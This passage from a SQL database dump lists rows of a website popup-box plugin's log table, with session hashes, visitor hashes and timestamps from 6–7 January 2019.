(46930, 'a102852aa093e4bcd2346cb109db0081', '57a3d4b8ea87b3d9', 0, 2, 1, '2019-01-06 10:38:20'),
(46931, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-06 10:40:41'),
(46932, '3faa2e74af6a9f9b0f211be1a966b590', '9fa71c818742c95f', 0, 2, 1, '2019-01-06 10:41:09'),
(46933, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-06 10:41:20'),
(46934, 'e666aa9dd955e7b6cbde4f7e4c8ced5a', '814e14b432590743', 0, 2, 1, '2019-01-06 10:41:55'),
(46935, 'b4c4c2eb9240528e8898f369655e01f3', 'c5b42dbb0bb6215a', 0, 2, 1, '2019-01-06 10:43:43'),
(46936, 'f50867d366aff631924e1dc38f6f8a63', '71f85176cde554ff', 0, 2, 1, '2019-01-06 10:43:51'),
(46937, 'bb83ad2c1948a38ca5f744642b7876a6', '0530018377078939', 0, 2, 1, '2019-01-06 10:43:56'),
(46938, 'bb83ad2c1948a38ca5f744642b7876a6', '0530018377078939', 0, 2, 1, '2019-01-06 10:44:24'),
(46939, 'b4c4c2eb9240528e8898f369655e01f3', 'c5b42dbb0bb6215a', 0, 2, 1, '2019-01-06 10:44:51'),
(46940, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-06 10:46:13'),
(46941, '3097989a668fd8815c3eb1ab3bb65a84', 'a639f655bef0fc87', 0, 2, 1, '2019-01-06 10:46:19'),
(46942, '03dc3bc9d4915bde009a09bf8b3cbb79', '9485c0cbaf2078d7', 0, 2, 1, '2019-01-06 10:49:49'),
(46943, '31274d4a0f33d42f23b5cb9db1769b71', 'b2bafb74467116e9', 0, 2, 1, '2019-01-06 10:49:52'),
(46944, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-06 10:50:58'),
(46945, '125cdce450d7b8b82459adf4f046dbe0', '19ac418837a1bfb6', 0, 2, 1, '2019-01-06 10:54:45'),
(46946, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-06 10:55:41'),
(46947, '5e76201bde72946336672bbdaaed7237', '0294702aa8f2a229', 0, 2, 1, '2019-01-06 10:56:20'),
(46948, '5e76201bde72946336672bbdaaed7237', '0294702aa8f2a229', 0, 2, 1, '2019-01-06 10:56:32'),
(46949, '5e76201bde72946336672bbdaaed7237', '0294702aa8f2a229', 0, 2, 1, '2019-01-06 10:56:56'),
(46950, '5e76201bde72946336672bbdaaed7237', '0294702aa8f2a229', 0, 2, 1, '2019-01-06 10:57:23'),
(46951, 'e8689727dae7cc772b82891e26297991', '7a69e1f82b8edb5f', 0, 2, 1, '2019-01-06 10:57:36'),
(46952, 'e8689727dae7cc772b82891e26297991', '7a69e1f82b8edb5f', 0, 2, 1, '2019-01-06 10:57:53');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(46953, '5e76201bde72946336672bbdaaed7237', '0294702aa8f2a229', 0, 2, 1, '2019-01-06 10:57:57'),
(46954, '3a4a3ca7ef08724d742ad4226cae0e6f', 'a783a1253a9fde8e', 0, 2, 1, '2019-01-06 10:58:02'),
(46955, '5e76201bde72946336672bbdaaed7237', '0294702aa8f2a229', 0, 2, 1, '2019-01-06 10:58:15'),
(46956, 'b4c4c2eb9240528e8898f369655e01f3', 'c5b42dbb0bb6215a', 0, 2, 1, '2019-01-06 10:58:28'),
(46957, '5e76201bde72946336672bbdaaed7237', '0294702aa8f2a229', 0, 2, 1, '2019-01-06 10:58:39'),
(46958, '5e76201bde72946336672bbdaaed7237', '0294702aa8f2a229', 0, 2, 1, '2019-01-06 10:58:53'),
(46959, 'e8689727dae7cc772b82891e26297991', '7a69e1f82b8edb5f', 0, 2, 1, '2019-01-06 10:59:12'),
(46960, '50f25e3c0b67671102f57288d5d9fd40', '296d9de09b136627', 0, 2, 1, '2019-01-06 10:59:18'),
(46961, '5e76201bde72946336672bbdaaed7237', '0294702aa8f2a229', 0, 2, 1, '2019-01-06 10:59:31'),
(46962, '5e76201bde72946336672bbdaaed7237', '0294702aa8f2a229', 0, 2, 1, '2019-01-06 10:59:46'),
(46963, '5e76201bde72946336672bbdaaed7237', '0294702aa8f2a229', 0, 2, 1, '2019-01-06 10:59:53'),
(46964, '5e76201bde72946336672bbdaaed7237', '0294702aa8f2a229', 0, 2, 1, '2019-01-06 11:00:05'),
(46965, '1df9226f74d3c27c2fc5f5b28b176bdd', '32b169e936bbe5df', 0, 2, 1, '2019-01-06 11:00:10'),
(46966, 'f989ed90965d19a82f062040856c0e6d', '35a6b4e700972ed6', 0, 2, 1, '2019-01-06 11:00:23'),
(46967, 'c256789e59211c721504e75c9892745e', '2034f09284a4c7ca', 0, 2, 1, '2019-01-06 11:01:51'),
(46968, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-06 11:02:05'),
(46969, 'ca8d89fe8b3159d89509023bcb40adf1', '069827ca06c91db5', 0, 2, 1, '2019-01-06 11:02:47'),
(46970, '76993af9c95b32253db576f22299a54f', '61b5e7c2277b2a5b', 0, 2, 1, '2019-01-06 11:03:03'),
(46971, 'ca8d89fe8b3159d89509023bcb40adf1', '069827ca06c91db5', 0, 2, 1, '2019-01-06 11:03:05'),
(46972, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-06 11:03:07'),
(46973, 'bfdfa66ce220e85a64228db9c2b21628', '46713cac27a94b83', 0, 2, 1, '2019-01-06 11:03:27'),
(46974, '9a4b1d8320b8e2ee86d3b8a722760d87', '00cfdd65313a346b', 0, 2, 1, '2019-01-06 11:03:41'),
(46975, '76993af9c95b32253db576f22299a54f', '61b5e7c2277b2a5b', 0, 2, 1, '2019-01-06 11:03:48'),
(46976, 'ca8d89fe8b3159d89509023bcb40adf1', '069827ca06c91db5', 0, 2, 1, '2019-01-06 11:04:21'),
(46977, '1df9226f74d3c27c2fc5f5b28b176bdd', '32b169e936bbe5df', 0, 2, 1, '2019-01-06 11:06:20'),
(46978, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-06 11:07:04'),
(46979, '139559188ad4a6c855487a71a92b896e', 'e7b58577fad67f20', 0, 2, 1, '2019-01-06 11:09:36'),
(46980, '139559188ad4a6c855487a71a92b896e', 'e7b58577fad67f20', 0, 2, 1, '2019-01-06 11:09:48'),
(46981, '7a8ec69196cefb354c55e5661e95ccbc', 'cd739182be9070e6', 0, 2, 1, '2019-01-06 11:11:10'),
(46982, 'bfdfa66ce220e85a64228db9c2b21628', '46713cac27a94b83', 0, 2, 1, '2019-01-06 11:14:17'),
(46983, '034d55b0c718eb7f467ff2a7f1dcb452', '9485c0cbaf2078d7', 0, 2, 1, '2019-01-06 11:17:46'),
(46984, 'b4c4c2eb9240528e8898f369655e01f3', 'c5b42dbb0bb6215a', 0, 2, 1, '2019-01-06 11:17:54'),
(46985, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-06 11:18:56'),
(46986, 'b9a0714430f6cde9e0c053a5c91b5b50', '516da39d8168d0b6', 0, 2, 1, '2019-01-06 11:20:01'),
(46987, 'a9143a9245618760f607f705cece8bfa', 'f8f70c95a9dd1c3e', 0, 2, 1, '2019-01-06 11:20:05'),
(46988, 'a9143a9245618760f607f705cece8bfa', 'f8f70c95a9dd1c3e', 0, 2, 1, '2019-01-06 11:21:06'),
(46989, 'a9143a9245618760f607f705cece8bfa', 'f8f70c95a9dd1c3e', 0, 2, 1, '2019-01-06 11:21:18'),
(46990, '43e79314e7c0c89be66eb3bac0035cae', 'baa8d16c1a4e5230', 0, 2, 1, '2019-01-06 11:26:09'),
(46991, '43e79314e7c0c89be66eb3bac0035cae', 'baa8d16c1a4e5230', 0, 2, 1, '2019-01-06 11:26:20'),
(46992, 'ae4bfad73506e6cbb7bfa460848e4a4b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-06 11:26:27'),
(46993, 'ae4bfad73506e6cbb7bfa460848e4a4b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-06 11:27:00'),
(46994, '43e79314e7c0c89be66eb3bac0035cae', 'baa8d16c1a4e5230', 0, 2, 1, '2019-01-06 11:27:05'),
(46995, 'e6e6c7f3abe8adf59b91b741ffeaac2d', 'd1187d316dfba535', 0, 2, 1, '2019-01-06 11:27:19'),
(46996, '43e79314e7c0c89be66eb3bac0035cae', 'baa8d16c1a4e5230', 0, 2, 1, '2019-01-06 11:28:02'),
(46997, 'e6e6c7f3abe8adf59b91b741ffeaac2d', 'd1187d316dfba535', 0, 2, 1, '2019-01-06 11:32:40'),
(46998, '390830eb2b4627f39b8640ac2877453e', '13520fddf1772644', 0, 2, 1, '2019-01-06 11:35:09'),
(46999, 'ae4bfad73506e6cbb7bfa460848e4a4b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-06 11:35:25'),
(47000, '5a6e94575c769c7be9ee194938bc3bdc', '790fbcccb3362dd5', 0, 2, 1, '2019-01-06 11:44:30'),
(47001, '30d872f39898b42fa943f917adbc1227', '12fc4b801e5257e8', 0, 2, 1, '2019-01-06 11:47:43'),
(47002, '93e0807edd7ca57cff1827d2f36ad4cc', 'ac09ca77f69957ce', 0, 2, 1, '2019-01-06 11:48:18'),
(47003, '9c61094a36e85122fffb7dfe6b98de7b', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-06 11:49:09'),
(47004, '93e0807edd7ca57cff1827d2f36ad4cc', 'ac09ca77f69957ce', 0, 2, 1, '2019-01-06 11:51:10'),
(47005, '93e0807edd7ca57cff1827d2f36ad4cc', 'ac09ca77f69957ce', 0, 2, 1, '2019-01-06 11:51:36'),
(47006, '93e0807edd7ca57cff1827d2f36ad4cc', 'ac09ca77f69957ce', 0, 2, 1, '2019-01-06 11:52:15'),
(47007, '93e0807edd7ca57cff1827d2f36ad4cc', 'ac09ca77f69957ce', 0, 2, 1, '2019-01-06 11:52:28'),
(47008, 'e666aa9dd955e7b6cbde4f7e4c8ced5a', '814e14b432590743', 0, 2, 1, '2019-01-06 11:54:19'),
(47009, 'e666aa9dd955e7b6cbde4f7e4c8ced5a', '814e14b432590743', 0, 2, 1, '2019-01-06 11:54:41'),
(47010, 'e666aa9dd955e7b6cbde4f7e4c8ced5a', '814e14b432590743', 0, 2, 1, '2019-01-06 11:56:21'),
(47011, '475cc50e593d36bb06a46f1323e6cf61', '6bc6f5105d30e388', 0, 2, 1, '2019-01-06 11:57:35'),
(47012, 'b58a798a291e93b5f1f6cac018f9d018', 'e811532d4fba8e9c', 0, 2, 1, '2019-01-06 12:08:06'),
(47013, 'b58a798a291e93b5f1f6cac018f9d018', 'e811532d4fba8e9c', 0, 2, 1, '2019-01-06 12:34:55'),
(47014, 'd5cfcbef00bbc26971f0a05e0905a044', 'd11c71184ec28f6f', 0, 2, 1, '2019-01-06 12:41:41'),
(47015, 'd5cfcbef00bbc26971f0a05e0905a044', 'd11c71184ec28f6f', 0, 2, 1, '2019-01-06 12:42:21'),
(47016, '5a6e94575c769c7be9ee194938bc3bdc', '790fbcccb3362dd5', 0, 2, 1, '2019-01-06 12:42:36'),
(47017, 'd5cfcbef00bbc26971f0a05e0905a044', 'd11c71184ec28f6f', 0, 2, 1, '2019-01-06 12:43:16'),
(47018, 'd5cfcbef00bbc26971f0a05e0905a044', 'd11c71184ec28f6f', 0, 2, 1, '2019-01-06 12:43:48'),
(47019, 'd5cfcbef00bbc26971f0a05e0905a044', 'd11c71184ec28f6f', 0, 2, 1, '2019-01-06 12:44:20'),
(47020, 'd5cfcbef00bbc26971f0a05e0905a044', 'd11c71184ec28f6f', 0, 2, 1, '2019-01-06 12:45:22'),
(47021, 'd5cfcbef00bbc26971f0a05e0905a044', 'd11c71184ec28f6f', 0, 2, 1, '2019-01-06 12:46:00'),
(47022, 'c18eafc1220bad078309032a18bebbac', '53c246121f478972', 0, 2, 1, '2019-01-06 12:47:58'),
(47023, 'd5cfcbef00bbc26971f0a05e0905a044', 'd11c71184ec28f6f', 0, 2, 1, '2019-01-06 12:48:49'),
(47024, 'd5cfcbef00bbc26971f0a05e0905a044', 'd11c71184ec28f6f', 0, 2, 1, '2019-01-06 12:50:13'),
(47025, 'd5cfcbef00bbc26971f0a05e0905a044', 'd11c71184ec28f6f', 0, 2, 1, '2019-01-06 12:50:13'),
(47026, 'a60847b6b97a3f8e6bec5ab05ea1a2a2', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-06 12:52:47'),
(47027, 'a60847b6b97a3f8e6bec5ab05ea1a2a2', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-06 12:53:30'),
(47028, 'a7a454728e205b5fa61af9c744ce6cfb', 'b0d0f692147f0dd4', 0, 2, 1, '2019-01-06 12:59:49'),
(47029, '2556f8b73de19fd7bfc7241680372942', 'df6b147da70b7b48', 0, 2, 1, '2019-01-06 13:01:05'),
(47030, '1346bcf132929d4b557fc420f7597676', '814e14b432590743', 0, 2, 1, '2019-01-06 13:01:14'),
(47031, 'e676ac11918feb1dd403f5dba9a5b901', 'cd809b8cde078906', 0, 2, 1, '2019-01-06 13:04:58'),
(47032, 'd0f0ae6e1b2bad0c9eaab234786e900d', '4c38a2f2118e4994', 0, 2, 1, '2019-01-06 13:05:21'),
(47033, 'd0f0ae6e1b2bad0c9eaab234786e900d', '4c38a2f2118e4994', 0, 2, 1, '2019-01-06 13:05:37'),
(47034, '153042ba29492973e282914b753db4a0', '8e815b2f4d02fe94', 0, 2, 1, '2019-01-06 13:07:01'),
(47035, 'bb83ad2c1948a38ca5f744642b7876a6', '0530018377078939', 0, 2, 1, '2019-01-06 13:08:39'),
(47036, 'a31a14f51555f8d173fae503755f2d02', 'e60565f388b0261b', 0, 2, 1, '2019-01-06 13:09:09'),
(47037, 'd81d61a9483b08afcc8cf98ab87062fb', '0d6d214e577e9800', 0, 2, 1, '2019-01-06 13:11:28'),
(47038, '853a7684fc1c4660e02dba0e0198437f', '4df5ced8675ad994', 0, 2, 1, '2019-01-06 13:11:39'),
(47039, '090fb7c5cc0872dd65f7971e3a69b385', '94911e62c3066b70', 0, 2, 1, '2019-01-06 13:12:07'),
(47040, '090fb7c5cc0872dd65f7971e3a69b385', '94911e62c3066b70', 0, 2, 1, '2019-01-06 13:12:29'),
(47041, '836d27090c0836c8cf2304d2c2ec1b48', '51df446c19685386', 0, 2, 1, '2019-01-06 13:14:10'),
(47042, 'ae4bfad73506e6cbb7bfa460848e4a4b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-06 13:17:30'),
(47043, '9ddc09d4a193d518d376181b7e51aea9', '81070426ca16cd24', 0, 2, 1, '2019-01-06 13:18:26'),
(47044, '9ddc09d4a193d518d376181b7e51aea9', '81070426ca16cd24', 0, 2, 1, '2019-01-06 13:20:01'),
(47045, '9ddc09d4a193d518d376181b7e51aea9', '81070426ca16cd24', 0, 2, 1, '2019-01-06 13:20:43'),
(47046, '1df9226f74d3c27c2fc5f5b28b176bdd', '32b169e936bbe5df', 0, 2, 1, '2019-01-06 13:20:58'),
(47047, '9ddc09d4a193d518d376181b7e51aea9', '81070426ca16cd24', 0, 2, 1, '2019-01-06 13:21:16'),
(47048, 'd0c27e38c363c4da73521ebd9db2c182', 'b43949f3d3a73617', 0, 2, 1, '2019-01-06 13:25:49'),
(47049, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-06 13:27:02'),
(47050, '9a4b1d8320b8e2ee86d3b8a722760d87', '00cfdd65313a346b', 0, 2, 1, '2019-01-06 13:30:54'),
(47051, '1792c7643bb555b121cc83b0082c804b', 'fe0e637b0b9b7e87', 0, 2, 1, '2019-01-06 13:30:58'),
(47052, '1792c7643bb555b121cc83b0082c804b', 'fe0e637b0b9b7e87', 0, 2, 1, '2019-01-06 13:31:57'),
(47053, '9a4b1d8320b8e2ee86d3b8a722760d87', '00cfdd65313a346b', 0, 2, 1, '2019-01-06 13:34:02'),
(47054, '9a4b1d8320b8e2ee86d3b8a722760d87', '00cfdd65313a346b', 0, 2, 1, '2019-01-06 13:34:05'),
(47055, 'b0f9854fb90a1bd2715bd3f5412505c9', 'f10990f26adcd1c5', 0, 2, 1, '2019-01-06 13:35:19'),
(47056, 'b1eb5f4f1d42afb8728b42a4ce3f63a6', '7501b42c35accff7', 0, 2, 1, '2019-01-06 13:36:29'),
(47057, 'b1eb5f4f1d42afb8728b42a4ce3f63a6', '7501b42c35accff7', 0, 2, 1, '2019-01-06 13:36:52'),
(47058, 'b1eb5f4f1d42afb8728b42a4ce3f63a6', '7501b42c35accff7', 0, 2, 1, '2019-01-06 13:37:12'),
(47059, '1346bcf132929d4b557fc420f7597676', '814e14b432590743', 0, 2, 1, '2019-01-06 13:40:15'),
(47060, 'afea148b7cfffcb12358c236c3000bc8', '6e117bd555667400', 0, 2, 1, '2019-01-06 13:43:31'),
(47061, 'afea148b7cfffcb12358c236c3000bc8', '6e117bd555667400', 0, 2, 1, '2019-01-06 13:44:04'),
(47062, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-06 13:45:28'),
(47063, 'bb83ad2c1948a38ca5f744642b7876a6', '0530018377078939', 0, 2, 1, '2019-01-06 13:46:02'),
(47064, '845b1ee85593e4b32a2fa366b67297ef', '9e0d2d6ec4e6ebaa', 0, 2, 1, '2019-01-06 13:48:27'),
(47065, 'bb83ad2c1948a38ca5f744642b7876a6', '0530018377078939', 0, 2, 1, '2019-01-06 13:51:47'),
(47066, '2dc7c6c7ca5aac0fc7b248267450a5fa', '86fe9293971adad1', 0, 2, 1, '2019-01-06 13:52:47'),
(47067, 'bb83ad2c1948a38ca5f744642b7876a6', '0530018377078939', 0, 2, 1, '2019-01-06 13:57:45'),
(47068, 'eff8b6d22ee8db43966cb9e7bfb07ec0', 'f19010d8a5f137d0', 0, 2, 1, '2019-01-06 14:05:22'),
(47069, '1346bcf132929d4b557fc420f7597676', '814e14b432590743', 0, 2, 1, '2019-01-06 14:08:49'),
(47070, 'ae4bfad73506e6cbb7bfa460848e4a4b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-06 15:00:28'),
(47071, 'ae4bfad73506e6cbb7bfa460848e4a4b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-06 15:00:40'),
(47072, '9c8cec47312ad4754ea6655e42f4add3', '147b4db481f76a2c', 0, 2, 1, '2019-01-06 15:11:23'),
(47073, 'cd959d005eba129ea6f3cc0bba9829a3', 'e6d9961c68fd88c9', 0, 2, 1, '2019-01-06 15:16:09'),
(47074, 'cd959d005eba129ea6f3cc0bba9829a3', 'e6d9961c68fd88c9', 0, 2, 1, '2019-01-06 15:17:17'),
(47075, 'b987f8d41838d19a7e1f5c3d75d67779', 'e128c4ac75ed7413', 0, 2, 1, '2019-01-06 15:19:01'),
(47076, 'b3bbde6e943744f1f937ebfe06cfa4fa', 'bbef1786b9d11abe', 0, 2, 1, '2019-01-06 15:40:40'),
(47077, '286c620685a7df8d6ee256b2a30adae5', '2d69a7f87e2d9064', 0, 2, 1, '2019-01-06 15:41:20'),
(47078, '3a4a3ca7ef08724d742ad4226cae0e6f', 'a783a1253a9fde8e', 0, 2, 1, '2019-01-06 16:04:08'),
(47079, '46ac2cda871bf61eefe5d4698d52b79f', '8626c8dc114b3811', 0, 2, 1, '2019-01-06 16:05:13'),
(47080, '46ac2cda871bf61eefe5d4698d52b79f', '8626c8dc114b3811', 0, 2, 1, '2019-01-06 16:06:04'),
(47081, '46ac2cda871bf61eefe5d4698d52b79f', '8626c8dc114b3811', 0, 2, 1, '2019-01-06 16:06:21'),
(47082, '46ac2cda871bf61eefe5d4698d52b79f', '8626c8dc114b3811', 0, 2, 1, '2019-01-06 16:07:28'),
(47083, '46ac2cda871bf61eefe5d4698d52b79f', '8626c8dc114b3811', 0, 2, 1, '2019-01-06 16:08:52'),
(47084, '46ac2cda871bf61eefe5d4698d52b79f', '8626c8dc114b3811', 0, 2, 1, '2019-01-06 16:10:08'),
(47085, 'ef15dfe421c135678b651bfd041671e6', '428dc30b0f4b3a05', 0, 2, 1, '2019-01-06 16:14:15'),
(47086, '6ccd571d033cd8c7265df567874c06e2', '40cefe5da08d34c2', 0, 2, 1, '2019-01-06 16:20:44'),
(47087, '6ccd571d033cd8c7265df567874c06e2', '40cefe5da08d34c2', 0, 2, 1, '2019-01-06 16:23:23'),
(47088, '1c832385ac8e65e5b3998c8c20e3ad9d', '71ef6d97884b9419', 0, 2, 1, '2019-01-06 16:28:04'),
(47089, '76f6b477924f03300d7596559983759c', '069827ca06c91db5', 0, 2, 1, '2019-01-06 16:51:11'),
(47090, '76f6b477924f03300d7596559983759c', '069827ca06c91db5', 0, 2, 1, '2019-01-06 16:51:28'),
(47091, '76f6b477924f03300d7596559983759c', '069827ca06c91db5', 0, 2, 1, '2019-01-06 16:51:59'),
(47092, 'f133c284b1945556d7b9bf2088299ba6', 'bac41e6cf635f2bc', 0, 2, 1, '2019-01-06 17:52:13'),
(47093, 'b4e3d67af6597f7a65e828740ded86d3', '120b773821b5a659', 0, 2, 1, '2019-01-06 17:54:36'),
(47094, '530878d67f289eafede5522d62cc45b7', 'd09a3a195511f770', 0, 2, 1, '2019-01-06 17:55:24'),
(47095, '530878d67f289eafede5522d62cc45b7', 'd09a3a195511f770', 0, 2, 1, '2019-01-06 17:55:34'),
(47096, '530878d67f289eafede5522d62cc45b7', 'd09a3a195511f770', 0, 2, 1, '2019-01-06 17:55:46'),
(47097, '88f152375f20b905141c0950ffe35a5a', 'deab05a397bea13d', 0, 2, 1, '2019-01-06 17:58:43'),
(47098, '9e95f67ce48dfeceaaba4372a05a4d77', 'd6b9cd5bfdd27ced', 0, 2, 1, '2019-01-06 18:09:55'),
(47099, 'ffa10e0e2e52a19dd62210c34f75b95d', '846ebbc16c331d47', 0, 2, 1, '2019-01-06 18:15:01'),
(47100, '645a753d3e9433537dacfdb9c938cf34', '113a26d6adf3f967', 0, 2, 1, '2019-01-06 18:23:28'),
(47101, '7195cae08be5bd989cdb42093a305b07', 'ccf536893deac1fc', 0, 2, 1, '2019-01-06 18:39:51'),
(47102, 'b21ce49d82ff351b4af685fd2c10018c', '575b738595cdb2f5', 0, 2, 1, '2019-01-06 19:34:44'),
(47103, 'ae85e82946fca1df0960089005b28569', '113a26d6adf3f967', 0, 2, 1, '2019-01-06 19:36:47'),
(47104, 'd199bde5cbc1b564cf07908380ab3283', '0b1466b4de9b8a16', 0, 2, 1, '2019-01-06 19:38:15'),
(47105, '1a181849eced042d24e0fb540a0f0933', 'fe0e637b0b9b7e87', 0, 2, 1, '2019-01-06 19:38:47'),
(47106, 'a4917d049e8f5a84d46897d1cbd7a0b2', 'bac41e6cf635f2bc', 0, 2, 1, '2019-01-06 19:46:22'),
(47107, '1b8af0b1489d922d6082b9f7e107e1d0', 'abe6c8ead564b456', 0, 2, 1, '2019-01-06 19:47:51'),
(47108, '29549e870cf480ea8c98a48dd0b32e99', 'f8c526f4920f2a0b', 0, 2, 1, '2019-01-06 19:50:12'),
(47109, '29549e870cf480ea8c98a48dd0b32e99', 'f8c526f4920f2a0b', 0, 2, 1, '2019-01-06 19:52:06'),
(47110, 'ae4bfad73506e6cbb7bfa460848e4a4b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-06 20:03:21'),
(47111, 'ae85e82946fca1df0960089005b28569', '113a26d6adf3f967', 0, 2, 1, '2019-01-06 20:24:31'),
(47112, 'ae85e82946fca1df0960089005b28569', '113a26d6adf3f967', 0, 2, 1, '2019-01-06 20:26:56'),
(47113, 'ae85e82946fca1df0960089005b28569', '113a26d6adf3f967', 0, 2, 1, '2019-01-06 20:28:33'),
(47114, 'ae4bfad73506e6cbb7bfa460848e4a4b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-06 20:31:47'),
(47115, 'ae4bfad73506e6cbb7bfa460848e4a4b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-06 20:34:22'),
(47116, 'ae4bfad73506e6cbb7bfa460848e4a4b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-06 20:36:12'),
(47117, 'ae4bfad73506e6cbb7bfa460848e4a4b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-06 20:41:54'),
(47118, 'ae4bfad73506e6cbb7bfa460848e4a4b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-06 20:42:34'),
(47119, 'ae4bfad73506e6cbb7bfa460848e4a4b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-06 20:42:53'),
(47120, 'ae4bfad73506e6cbb7bfa460848e4a4b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-06 20:44:46'),
(47121, 'f29cf930243726179e8845e7e8e1a5b0', '944817f133330d52', 0, 2, 1, '2019-01-06 20:45:52'),
(47122, '8978bf56809ea84da19eccdd0c3b214c', '4ba95075b220e33d', 0, 2, 1, '2019-01-06 21:27:45'),
(47123, '8978bf56809ea84da19eccdd0c3b214c', '4ba95075b220e33d', 0, 2, 1, '2019-01-06 21:28:36'),
(47124, '8978bf56809ea84da19eccdd0c3b214c', '4ba95075b220e33d', 0, 2, 1, '2019-01-06 21:28:50'),
(47125, '8b587930b9c369a39a6197c44e80d005', '80d0e70110ede451', 0, 2, 1, '2019-01-06 21:49:51'),
(47126, '4baa6f386d87825df9120a37e90b031b', '82b0495042ec30da', 0, 2, 1, '2019-01-06 23:09:46'),
(47127, '4baa6f386d87825df9120a37e90b031b', '82b0495042ec30da', 0, 2, 1, '2019-01-06 23:09:54'),
(47128, '4baa6f386d87825df9120a37e90b031b', '82b0495042ec30da', 0, 2, 1, '2019-01-06 23:09:59'),
(47129, '4baa6f386d87825df9120a37e90b031b', '82b0495042ec30da', 0, 2, 1, '2019-01-06 23:10:16'),
(47130, '4baa6f386d87825df9120a37e90b031b', '82b0495042ec30da', 0, 2, 1, '2019-01-06 23:10:30'),
(47131, '4baa6f386d87825df9120a37e90b031b', '82b0495042ec30da', 0, 2, 1, '2019-01-06 23:10:53'),
(47132, '4baa6f386d87825df9120a37e90b031b', '82b0495042ec30da', 0, 2, 1, '2019-01-06 23:11:14'),
(47133, '4baa6f386d87825df9120a37e90b031b', '82b0495042ec30da', 0, 2, 1, '2019-01-06 23:11:20'),
(47134, '4baa6f386d87825df9120a37e90b031b', '82b0495042ec30da', 0, 2, 1, '2019-01-06 23:14:19'),
(47135, 'fd78abfa0421868eae72f33ca82bf20d', '82b0495042ec30da', 0, 2, 1, '2019-01-06 23:15:53'),
(47136, 'fd78abfa0421868eae72f33ca82bf20d', '82b0495042ec30da', 0, 2, 1, '2019-01-06 23:16:09'),
(47137, 'bfec52694055b652fa099f963471a0b0', '960d12b6c14f65ca', 0, 2, 1, '2019-01-06 23:35:14'),
(47138, '43e79314e7c0c89be66eb3bac0035cae', 'baa8d16c1a4e5230', 0, 2, 1, '2019-01-06 23:45:33'),
(47139, 'd282c154fe5dad63b71225ef5ea9927f', '7e1000f5ecf7b0dd', 0, 2, 1, '2019-01-06 23:46:35'),
(47140, 'bfec52694055b652fa099f963471a0b0', '960d12b6c14f65ca', 0, 2, 1, '2019-01-06 23:49:19'),
(47141, 'bfec52694055b652fa099f963471a0b0', '960d12b6c14f65ca', 0, 2, 1, '2019-01-06 23:49:45'),
(47142, 'f72869ad8bf09d0463fc9b47cb9b59b3', '880ae0ad5b0b28d0', 0, 2, 1, '2019-01-06 23:56:32'),
(47143, 'd7dc96b16b10b403a546762935adc884', '2fa458d0337a4355', 0, 2, 1, '2019-01-07 02:53:39'),
(47144, 'a49fb3e16ac91901494f3b845c9d885f', 'd5326df5abfc9fa5', 0, 2, 1, '2019-01-07 03:00:53'),
(47145, 'fd93901813d5bac019bf55ba5b2df2c9', 'b0d0f692147f0dd4', 0, 2, 1, '2019-01-07 03:28:18'),
(47146, '43e79314e7c0c89be66eb3bac0035cae', 'baa8d16c1a4e5230', 0, 2, 1, '2019-01-07 04:02:33'),
(47147, '43e79314e7c0c89be66eb3bac0035cae', 'baa8d16c1a4e5230', 0, 2, 1, '2019-01-07 04:02:43'),
(47148, '0dcc5cfc1b652dc9cf5c2f6e4fa4d13e', '02829647d6d6d42d', 0, 2, 1, '2019-01-07 04:17:22'),
(47149, 'bfec52694055b652fa099f963471a0b0', '960d12b6c14f65ca', 0, 2, 1, '2019-01-07 04:18:46'),
(47150, 'bfec52694055b652fa099f963471a0b0', '960d12b6c14f65ca', 0, 2, 1, '2019-01-07 04:19:04'),
(47151, 'c9c772514ead69348f4531a00db7516f', '1ec4ea2ab04ab771', 0, 2, 1, '2019-01-07 05:36:17'),
(47152, 'a237b0f4779fd6ab8151015afbc4fc84', '08a722ff5931e162', 0, 2, 1, '2019-01-07 05:39:51'),
(47153, 'e62547833458dadcd5f76f85b39367cf', 'c8d5401cd4573a2c', 0, 2, 1, '2019-01-07 05:43:08'),
(47154, 'e6e6a8bba7bf3525062330509642f098', '2ba9b65f6cac6f39', 0, 2, 1, '2019-01-07 05:48:22'),
(47155, '1a5ef3a63a6283abd51e82b5b9ac6f54', '1afdff054a155e14', 0, 2, 1, '2019-01-07 05:56:00'),
(47156, '1a5ef3a63a6283abd51e82b5b9ac6f54', '1afdff054a155e14', 0, 2, 1, '2019-01-07 06:01:32'),
(47157, '1a5ef3a63a6283abd51e82b5b9ac6f54', '1afdff054a155e14', 0, 2, 1, '2019-01-07 06:13:15'),
